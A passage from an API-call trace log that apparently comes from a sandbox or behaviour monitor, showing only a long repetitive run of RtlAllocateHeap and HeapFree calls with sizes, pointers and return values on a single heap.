Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.759] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.760] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.762] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.762] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.763] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.763] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.764] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.765] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.765] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.766] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.767] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.767] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.768] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.768] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.769] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.769] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.770] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.770] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.771] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.771] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.772] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.772] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.773] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.773] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.774] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.774] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.775] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.775] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.776] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.776] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.777] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.777] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.778] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.778] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.779] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.779] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.780] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.782] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.783] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.783] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.784] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.784] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.785] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.785] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.786] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.786] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.787] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.787] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.788] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.788] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.789] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.789] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.790] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.790] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.791] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.791] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.792] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.792] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.793] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.793] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.794] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.794] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.795] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.795] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.796] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.796] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.797] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.797] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.798] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.798] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.799] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.800] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.800] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.801] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.801] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.802] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.802] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.803] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.803] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.804] HeapFree (in: 